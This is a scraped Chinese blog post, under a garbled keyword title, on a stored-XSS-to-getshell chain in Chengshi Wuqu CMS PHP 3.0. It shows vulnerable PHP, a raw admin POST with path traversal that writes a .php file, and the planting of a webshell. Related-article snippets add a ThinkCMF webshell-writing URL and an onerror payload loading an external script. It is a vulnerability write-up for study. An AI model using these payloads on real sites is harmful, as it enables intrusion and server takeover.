php抓取%3ctr%3e中指定的数据,程氏舞曲CMSPHP3.0 储存型xss getshell

最新推荐文章于 2024-02-27 09:20:26 发布
最新推荐文章于 2024-02-27 09:20:26 发布
阅读量289 收藏
点赞数
文章标签: php抓取%3ctr%3e中指定的数据

Author:roker

这个cms 以前 90有人发了个getshell,当时 是后台验证文件的问题

官网已经修补了,所以重新下了源码

因为 后台登入 还需要认证码 所以 注入就没看了。

存在 xss

漏洞文件 user/member/skin_edit.php

[php]

*签名:

user/do.php

if($op=='zl'){ //资料

if(empty($CS_QQ)||empty($CS_Nichen)||empty($CS_City)||empty($CS_Email))

exit(Msg_Error('抱歉,请把资料填写完整!','javascript:history.go(-1);'));

$sql="update ".Getdbname('user')." set CS_Nichen='".$CS_Nichen."',CS_Email='".$CS_Email."',

CS_Sex=".$CS_Sex.",CS_City='".$CS_City."',CS_QQ='".$CS_QQ."',CS_Qianm='".$CS_Qianm."'

where CS_Name='".$cscms_name."'";

if($db->query($sql)){

exit(Msg_Error('恭喜您,修改成功了!','javascript:history.go(-1);'));

}else{

exit(Msg_Error('抱歉,修改失败了!','javascript:history.go(-1);'));

}[/php]

没有 过滤导致xss产生。

后台 看了下 很奇葩的是可以写任意格式文件。。

抓包。。

[php]

POST /admin/skins/skins.php?ac=xgmb&op=go&path=../../skins/index/html/ HTTP/1.1

Accept: text/html, application/xhtml+xml, */*

Referer: [url]http://127.0.0.1/admin/skins/skins.php?ac=xgmb&path=../../skins/index/html/&name=aaa.php[/url]

Accept-Language: zh-CN

User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

Content-Type: application/x-www-form-urlencoded

Accept-Encoding: gzip, deflate

Host: 127.0.0.1

Content-Length: 38

DNT: 1

Connection: Keep-Alive

Cache-Control: no-cache

Cookie: CS_AdminID=1; CS_AdminUserName=aaaa; CS_AdminPassWord=12949e83a49a0989aa46ab7e249ca34d; CS_Quanx=0_1%2C1_1%2C1_2%2C1_3%2C1_4%2C1_5%2C2_1%2C2_2%2C2_3%2C2_4%2C2_5%2C2_6%2C2_7%2C3_1%2C3_2%2C3_3%2C3_4%2C4_1%2C4_2%2C4_3%2C4_4%2C4_5%2C4_6%2C4_7%2C5_1%2C5_2%2C5_3%2C5_4%2C5_5%2C6_1%2C6_2%2C6_3%2C7_1%2C7_2%2C8_1%2C8_2%2C8_3%2C8_4; CS_Login=980bb0dfb9c7ba8ac7676b6f4eea2c4b; CS_AdminUP=1; cs_id=2; cs_name=test; PHPSESSID=36db4a484bdbd090ad9846e3b7f65594

name=aaa.php&content=%3Cs%3E%3Ca%25%3E

[/php]

于是 构造js如下。

[php]

[/php]

http://127.0.0.1/user/space.php?ac=edit&op=zl 修改签名处 插入

用你的账号给管理写个 私信 或者让他访问 你的主页http://127.0.0.1/home/?uid=2(uid自己改)

就会 在 skins\index\html\目录下生成 roker.php 一句话。

Excel小慢车
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
齐博 src="/do/js.php?id=775",齐博CMS存储XSS可getshell(组合利用)
weixin_35841706的博客
03-26 423
齐博cms,利用威胁不大的前台存储xss+没有任何危害的后台CSRF+几乎无影响可忽略的后台getshell 3个0day 结合起来的威力拿下齐博cms,虽然不算什么严重的漏洞,但是途遇到的问题和突破还是聊以慰藉的,还请各位看官轻轻拍砖. ——by pandas前一段时间西毒爆出qibocms 0day的时候 就看过齐博cms的代码,发现了几个后台的getshell,后台getshell很多,...
yxcms存储XSS至getshell 漏洞复现
Boom!脑洞大爆炸的博客
06-28 2002
yxcms存储XSS至getshell 漏洞复现
某211大学存储XSS+越权+信息泄露+getshell
m0_73049285的博客
04-15 479
前三个都没有,继续跑后面的,其实这边能跑的几率是比较大的,因为普通的大学生或者说普通人设置密码安全意识肯定没有学过网络安全类的人高,就连花某设置密码平常为了方便还是会设置成flower+xxx这种密码​,所以在收集的2,30个人肯定是会有2,3个人设置弱密码,果不其然。这边的学号啥的我都是不知道的而且这边最后显示的不是注册,显示的是提交所以可以断定注册账号得需要管理员审核信息才能注册,所以我没报啥希望随便编了一个1213311的学号,身份证号码是bing上随便搜的一个身份证。
php 去掉%3c p%3e,cmseasy csrf通过一个xss最后getshell
weixin_39609423的博客
03-28 2331
为什么我们要选择get类的呢,因为get类存储数据库的时候触发时候管理员是察觉不到的,可以通过图片等进行操作,然后我们存储一个xss后门,这样一来,我们就可以加载一个远端的js,那么就各种无视token和referer了开始我们先分析一段源代码:celive/admin/system.php:(line:128-142):if($do == 'add' and $username != ''...
XSS也能getshell
u014213713的专栏
05-15 5653
我的想法是这样的 有很多CMS都有 修改模板或者修改文件的功能 我们可以自己构造一个外部的URL去post提交修改模板或其他文件 从而实现XSSgetshell !同样这方法能做很多事情比如增加管理员账号什么的 前提条件要管理员登陆状态下 若CMS系统有XSS漏洞那就更完美了 呵呵 我这里随便找了一套带文件增 删 改 的cms测试呵呵(这CMS也有XSS不过因为魔术原因利用起来不太利索,这
phpget_headers函数的作用及用法的详细介绍
12-19
PHP编程语言,`get_headers()` 是一个非常实用的系统级函数,它允许开发者获取服务器对特定HTTP请求的响应头部信息。这些头部信息包含了关于请求URL的各种元数据,如状态码、日期、服务器类、内容长度等。下面...
php 正确解码javascript通过escape编码后的字符
12-17
2. 将匹配到的子串存储在数组`$ar`。 3. 遍历`$ar`数组,针对不同类的编码进行解码: - 如果子串不是以`%`开头,则直接添加到结果字符串 `$c` 。 - 如果子串以`%`开头但不以`u`开头,将其转换为十进制并转化...
phpext_cp3d69_Willow_phpext_
10-01
【标题】"phpext_cp3d69_Willow_phpext_" 暗示这是一个与PHP扩展相关的项目,可能是一个自定义的PHP扩展或者一个用于管理PHP扩展的工具,"cp3d69"可能是开发者的标识或者是版本号的一部分,而"Willow"可能是扩展的...
[HACK学习呀] - 2020-04-26 ThinkCMF缓存Getshell1
08-03
攻击者首先访问一个包含非法模板文件名的URL,例如`http://target.domain/?a=display&templateFile=%3C?php%20file_put_contents(%27m.php%27,%27%3C%3fphp+eval($_POST[%22X%22])%3b%3F%3E%27);die();?%3E`。这里...
记一次XSS至getshell全过程!
最新发布
hot_milk1的博客
02-27 1223
偶然在一次渗透过程发现一个客服系统聊天界面发现可以XSS对发送信息处进行抓包,可在content参数插入xss语句这是访客前台效果:这是后台管理的效果:而且只要客服查看信息,便可以执行XSS语句然并卵,本来想钓客服的cookie,登录后台,找到shell点,成功getshell(幻想时间),但是经过测试,发现该客服系统的session是受保护的,并不能窃取到cookie已经决定放弃这个点了,随后在审计源码后,发现了图片上传点老样子,抓包改后缀解码得知,不支持php的文件格式。
xss跳转代码_记一次渗透测试从XSS到Getshell过程(详细到无语)
weixin_39671631的博客
11-22 944
0X00前言前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。0X01钓鱼到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。于是我打开这个站看...
网站渗透总结之Getshell用法大全
LinkSLA的博客
11-07 2418
后台数据库备份getshell,上传图片马并获取图片马路径,通过数据库备份修改后缀名,如有后缀名无法修改或路径无法修改限制可修改前端代码绕过,当所备份的数据库来源无法修改时,我们可以通过首先将一句话木马写入数据
XSS漏洞-06】XSS漏洞利用案例(浏览器劫持、会话劫持、GetShell)—基于神器beEF
m0_64378913的博客
06-02 4339
(1)了解beEF工具的使用; (2)加深理解XSS漏洞的利用和危害; (3)掌握浏览器劫持的攻击方法; (4)掌握会话劫持的攻击方法; (5)掌握通过XSS漏洞GetShell的方法。
利用XSS漏洞读取任意文件,get新思路!
weixin_54787877的博客
03-15 3267
简述 网站是一个在线填写报表功能,填写好报表之后可以生成报表的pdf文件 思路讲解 1. 发现解析xss 首先随便输入一个payload,"><S>aaa 。发现输入的标签被解析了 2. 用iframe标签加载,但是没有内容 使用iframe标签,但是没有内容。Id=b9bc3d&utrnumber="><iframe src="http://localhost"></iframe>&date=20 ...
PHPMyWind5.4存储XSS后续getshell提权
04-13 650
0x0 前言 通过留言处的xss,我们可以得到管理员的cookie,进而登陆后台: https://www.cnblogs.com/Rain99-/p/10701769.html 现在要从后台入手,进而getshell,提权 0x1 文件上传getshell 1. 修改上传类 已经成功登陆了后台,管理员权限相对普通用户要高的多,所以可设置的地方也会变多。利用这些设置,可以进...
XSS漏洞07】基于神器beEF的XSS漏洞利用实验(浏览器劫持、会话劫持、GetShell
Fighting_hawk的博客
02-26 4798
1. 加深理解XSS漏洞的利用和危害; 2. 了解beEF工具的使用; 3. 掌握浏览器劫持的攻击方法; 4. 掌握会话劫持的攻击方法; 5. 掌握通过XSS漏洞GetShell的方法。
【漏洞学习——XSS】fineCMS免费版xss+getshell
Fly_鹏程万里
02-22 1831
漏洞细节 注册一个用户,在发表文章的地方发表文章 在编辑器里加入一张图片 用firebug修改图片地址 加入onerror属性 onerror=document.body.appendChild(document.createElement('script')).src='//xxx.xxx/a.js' 因为发表的文章需要后台管理员审核的,当管理员审核的时候触发漏洞 然后是getsh...
存储XSS漏洞-详细教学
weixin_45873667的博客
05-18 2891
存储XSS漏洞: 存储XSS漏洞跟反射形成的原因一样,不同的是存储XSS下攻击者可以将脚本 注入到后台存储起来,构成更加持久的危害,因此存储XSS也称“永久XSS。 实验演示: 看到这是一个留言板,我们随意输入字符,发现输入的字符会存在后台或者存在了配置文件当。 接下来,我们测试这里是否存在xss漏洞,我们输入一些特殊字符:’”<>?&666666666666,点击提交。 发现我们的输入直接被当作留言显示出来。我们再看页面源码。 我们的输入都被原封不动的输出了,说明没有做
Xilinx Spartan-3E FPGA数据手册概览
"Spartan-3E FPGA 数据手册提供了关于Xilinx公司的Spartan-3E FPGA的详细技术信息,包括其架构、特性、配置、I/O能力、封装标识、订单信息以及功能描述等。该手册由Shanan进行不完全汉化,基于Xilinx官方的DS312...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值